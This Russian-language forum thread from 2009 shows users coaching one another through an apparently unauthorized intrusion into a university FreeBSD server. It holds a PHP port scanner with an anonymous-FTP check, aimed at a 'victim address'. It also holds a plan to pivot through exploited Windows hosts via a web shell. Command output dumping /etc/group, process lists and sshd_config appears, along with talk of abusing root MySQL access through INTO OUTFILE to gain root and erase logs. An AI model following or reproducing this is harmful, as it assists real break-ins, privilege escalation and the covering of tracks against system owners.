Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

25.01.2009, 20:18
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме: 3718311
Репутация:
1118
|
|
Как вариант рассуждаем:
У нас есть сервак и походу он является университетским тоесть состоит в сети 192.168.0/24.
Вполне возможно и даже скорее всего что в этой сети юзаются компы с Windows Xp и вполне возможно есть дырявая.
Проверяем сервак на предмет наличия популярных сканеров портов и если есть то сканим всю поддсеть, если нет то выход может быть такой
Код:
Источник кода security-teams.ne
#####################################################
#!/usr/local/bin/php
<?
class thread
{
function sock($net,$p)
{
@$sock = fsockopen($net,$p,$errno, $errstr,5);
if($sock == true) {print $p." - open\n";} else { print $p." - close\n"; }
if($p == 21) $this->ftp_valid($sock); else;
@fclose($sock);
}
function self($line)
{
list($code,$mesg)=split(' ',$line,2);
print $code." ".$mesg."\r\n";
return $code;
}
function ftp_valid($sock)
{
print "#############проверка на анонимный FTP доступ############\n";
$line=fgets($sock);
$code = $this->self($line);
if($code == 220)
{
fwrite($sock,"user anonymous\r\n");
$line=fgets($sock);
$code = $this->self($line);
if($code == 331)
{
fwrite($sock,"pass jonny@localhost.com\r\n");
$line=fgets($sock);
$code = $this->self($line);
}
else;
}
else;
print "##############################################################\n";
}
function open_relay($sock)
{
}
}
if(empty($argv[2]))
{$port = array(21,22,23,24,25,80,81,110,143,135,139,445,3306,3124,3128,3389,8080);}
elseif($argv[2]=="all")
{
$j=1;
while($j<=10000)
{
$port[]=$j;
$j++;
}
}
else
{ print "Wrong parametr!!!\n";}
$object = new thread();
$i = 0;
if(!empty($argv[1]))
{
$host = $argv[1];
print "Host $host is scanned....\n";
while(isset($port[$i]))
{
$p = $port[$i];
$object->sock($host,$p);
$i++;
}
}
else;
?>
#####################################################
$ ./ports.php [Адрес жертвы] [port [all]] | grep open
Ищем машины с портами которые как правило юзаются виндами и далее пробуем сплойтами пробить машинку + при удаче установить консольный SSH клиент и юзать связку
WebShell -> Телнет Винды --> SSH WEB сервака
Примерно так..
При условии что SSH тупо не забит только на один IP админа.
Последний раз редактировалось POS_troi; 25.01.2009 в 20:24..
|
|
|

25.01.2009, 20:28
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Код:
cat /etc/group
# $FreeBSD: src/etc/group,v 1.35 2007/06/11 18:36:39 ceri Exp $
#
wheel:*:0:root
daemon:*:1:
kmem:*:2:
sys:*:3:
tty:*:4:
operator:*:5:root
mail:*:6:postfix
bin:*:7:
news:*:8:
man:*:9:
games:*:13:
ftp:*:14:
staff:*:20:
sshd:*:22:
smmsp:*:25:
mailnull:*:26:
guest:*:31:
bind:*:53:
proxy:*:62:
authpf:*:63:
_pflogd:*:64:
_dhcp:*:65:
uucp:*:66:
dialer:*:68:
network:*:69:
audit:*:77:
www:*:80:
nogroup:*:65533:
nobody:*:65534:
messagebus:*:556:
polkit:*:562:
mgradmin:*:1000:
mgrreseller:*:1001:
mgrsecure:*:1002:user_ugkp,user_gras,user_smart,user_gm144
cyrus:*:60:
postfix:*:125:
maildrop:*:126:
dovecot:*:143:
mysql:*:88:
user_ugkp:*:1004:
user_gras:*:1005:
user_smart:*:1006:
fetchmail:*:124:
squid:*:100:
cups:*:193:
user_gm144:*:1007:
Код:
cat /etc/sudoers
cat: /etc/sudoers: No such file or directory
Код:
id
uid=1026(user_gm144) gid=1007(user_gm144) groups=1007(user_gm144),1002(mgrsecure)
Что дальше? 
|
|
|

25.01.2009, 20:48
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме: 3718311
Репутация:
1118
|
|
ну все что осталось это прописать в
/etc/group
wheel:*:0:root,user_gm144

|
|
|

25.01.2009, 20:54
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Сообщение от POS_troi
ну все что осталось это прописать в
/etc/group
wheel:*:0:root,user_gm144

Прав не хватает.
|
|
|

25.01.2009, 21:01
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме: 3718311
Репутация:
1118
|
|
Знаю =)
Кстати этот сервер тебе уже поиграться только, утром админ спалит ибо наследил уже хорошо (при учете что админ там есть и ему не пофигу)
Вывод в студию.
Иногда встречаються серваки у которых на sshd_config встречаються права 777 =)
кстати заодно и
Код:
cat /etc/ssh/sshd_config
Последний раз редактировалось POS_troi; 25.01.2009 в 21:05..
|
|
|

25.01.2009, 21:24
|
|
Постоянный
Регистрация: 31.08.2007
Сообщений: 571
Провел на форуме: 1847821
Репутация:
953
|
|
ТС, бросай все это, размагничивай и сжигай комп пока не поздно, хотя.... кароче, наверное, уже выехали 
|
|
|

25.01.2009, 21:35
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме: 3718311
Репутация:
1118
|
|
кароче, наверное, уже выехали
не пугай так ТС, все когдато игрались =)
И все же мне очень интересно какой там админ, шелл завтра снесут или будет жить =)
|
|
|

25.01.2009, 21:45
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Шелл уже 3 дня живёт. И забыл написать, что имею доступ из-под рута к MySQL. Может получиться через MySQL сделать ту запись в файл, чтобы зайти под рута?
Рут мне нужен что бы не просто поиграться. Логи ведь надо почистить все... 
Последний раз редактировалось InFlame; 25.01.2009 в 21:54..
|
|
|

25.01.2009, 22:06
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме: 3718311
Репутация:
1118
|
|
Вывод
В студию, предыдущие из 45 поста тоже желательно
|
|
|

26.01.2009, 08:48
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Вот:
Код:
ps -U root
PID TT STAT TIME COMMAND
0 ?? WLs 0:00.01 [swapper]
1 ?? SLs 0:00.01 /sbin/init --
2 ?? DL 0:08.57 [g_event]
3 ?? DL 0:15.62 [g_up]
4 ?? DL 0:16.88 [g_down]
5 ?? DL 0:00.00 [thread taskq]
6 ?? DL 0:00.00 [acpi_task_0]
7 ?? DL 0:00.00 [acpi_task_1]
8 ?? DL 0:00.00 [acpi_task_2]
9 ?? DL 0:00.00 [xpt_thrd]
10 ?? DL 0:00.00 [audit]
11 ?? RL 5588:57.04 [idle: cpu3]
12 ?? RL 5588:40.67 [idle: cpu2]
13 ?? RL 5572:06.55 [idle: cpu1]
14 ?? RL 5521:42.77 [idle: cpu0]
15 ?? WL 63:37.48 [swi4: clock sio]
16 ?? WL 0:00.00 [swi3: vm]
17 ?? WL 0:00.90 [swi1: net]
18 ?? DL 0:08.80 [yarrow]
19 ?? WL 0:00.02 [swi5: +]
20 ?? WL 0:00.00 [swi6: Giant taskq]
21 ?? WL 0:00.00 [swi6: task queue]
22 ?? WL 0:03.67 [swi2: cambio]
23 ?? DL 0:00.00 [kqueue taskq]
24 ?? WL 0:00.00 [irq9: acpi0]
25 ?? WL 0:01.72 [irq16: mpt0]
26 ?? DL 0:00.00 [mpt_recovery0]
27 ?? DL 0:05.90 [em0 taskq]
28 ?? DL 0:25.32 [em1 taskq]
29 ?? WL 0:00.00 [irq23: uhci0 uhci+]
30 ?? DL 0:00.05 [usb0]
31 ?? DL 0:00.00 [usbtask-hc]
32 ?? DL 0:00.00 [usbtask-dr]
33 ?? WL 0:00.00 [irq22: uhci1 uhci3]
34 ?? DL 0:00.05 [usb1]
35 ?? DL 0:00.05 [usb2]
36 ?? DL 0:00.05 [usb3]
37 ?? DL 0:00.05 [usb4]
38 ?? WL 0:00.00 [irq14: ata0]
39 ?? WL 0:00.00 [irq15: ata1]
40 ?? WL 0:00.00 [irq20: atapci1]
41 ?? WL 0:00.00 [swi0: sio]
42 ?? WL 0:00.00 [irq1: atkbd0]
43 ?? WL 0:00.01 [irq12: psm0]
44 ?? DL 0:00.00 [sctp_iterator]
45 ?? DL 0:00.55 [pagedaemon]
46 ?? DL 0:00.00 [vmdaemon]
47 ?? DL 0:00.01 [pagezero]
48 ?? DL 0:01.33 [bufdaemon]
49 ?? DL 0:01.36 [vnlru]
50 ?? DL 8:25.24 [syncer]
51 ?? DL 0:02.00 [softdepflush]
52 ?? DL 0:14.95 [schedcpu]
142 ?? Is 0:00.00 adjkerntz -i
430 ?? Is 0:00.22 /sbin/devd
844 ?? Ss 0:02.34 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/r
1149 ?? Is 0:08.51 /usr/local/libexec/postfix/master
1173 ?? Ss 0:07.31 /usr/local/sbin/dovecot
1174 ?? S 0:08.80 dovecot-auth
1182 ?? Ss 0:05.90 /usr/local/sbin/httpd -DNOHTTPACCEPT
1208 ?? Is 0:00.24 /usr/sbin/sshd
1213 ?? Ss 0:00.93 /usr/sbin/cron -s
1228 ?? Is 0:00.27 /usr/sbin/moused -p /dev/psm0 -t auto
1255 ?? Is 0:00.28 /usr/sbin/inetd -wW -C 60
6163 ?? S 0:00.59 /usr/local/ispmgr/bin/ispmgr
1276 v0 Is+ 0:00.00 /usr/libexec/getty Pc ttyv0
1277 v1 Is+ 0:00.00 /usr/libexec/getty Pc ttyv1
1278 v2 Is+ 0:00.00 /usr/libexec/getty Pc ttyv2
1279 v3 Is+ 0:00.00 /usr/libexec/getty Pc ttyv3
1280 v4 Is+ 0:00.00 /usr/libexec/getty Pc ttyv4
1281 v5 Is+ 0:00.00 /usr/libexec/getty Pc ttyv5
1282 v6 Is+ 0:00.00 /usr/libexec/getty Pc ttyv6
1283 v7 Is+ 0:00.00 /usr/libexec/getty Pc ttyv7
1097 con- S+ 0:25.53 /usr/local/bin/samsdaemon
Код:
ls -l /etc/ssh
total 296
-rw-r--r-- 1 root wheel 132839 Feb 24 2008 moduli
-rw-r--r-- 1 root wheel 1533 Feb 24 2008 ssh_config
-rw------- 1 root wheel 668 Jul 31 14:14 ssh_host_dsa_key
-rw-r--r-- 1 root wheel 595 Jul 31 14:14 ssh_host_dsa_key.pub
-rw------- 1 root wheel 520 Jul 31 14:14 ssh_host_key
-rw-r--r-- 1 root wheel 324 Jul 31 14:14 ssh_host_key.pub
-rw------- 1 root wheel 1675 Jul 31 14:14 ssh_host_rsa_key
-rw-r--r-- 1 root wheel 387 Jul 31 14:14 ssh_host_rsa_key.pub
-rw-r--r-- 1 root wheel 3241 Aug 5 11:55 sshd_config
Код:
cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.74 2006/07/19 13:07:10 dtucker Exp $
# $FreeBSD: src/crypto/openssh/sshd_config,v 1.47 2006/11/10 16:52:41 des
Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options change a
# default value.
# Note that some of FreeBSD's defaults differ from OpenBSD's, and
# FreeBSD has a few additional options.
#VersionAddendum FreeBSD-20061110
#Port 22
#Protocol 2
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key
# HostKeys for protocol version 2
#HostKey /etc/ssh/ssh_host_dsa_key
# Lifetime and size of ephemeral version 1 server key
#KeyRegenerationInterval 1h
#ServerKeyBits 768
# Logging
# obsoletes QuietMode and FascistLogging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
#PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
#RSAAuthentication yes
#PubkeyAuthentication yes
#AuthorizedKeysFile .ssh/authorized_keys
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#RhostsRSAAuthentication no
# similar for protocol version 2
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# RhostsRSAAuthentication and HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# Change to yes to enable built-in password authentication.
PasswordAuthentication yes
#PermitEmptyPasswords no
# Change to no to disable PAM authentication
#ChallengeResponseAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
# Set this to 'no' to disable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
#UsePAM yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#UsePrivilegeSeparation yes
#PermitUserEnvironment no
Compression yes
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS yes
#PidFile /var/run/sshd.pid
#MaxStartups 10
#PermitTunnel no
# no default banner path
#Banner /some/path
# override default of no subsystems
Subsystem sftp /usr/libexec/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# ForceCommand cvs server
А доступ к мускулу с правами рута что ли ничего не даёт? Например через into outfile подредактировать файл /etc/group.
Последний раз редактировалось InFlame; 26.01.2009 в 10:21..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|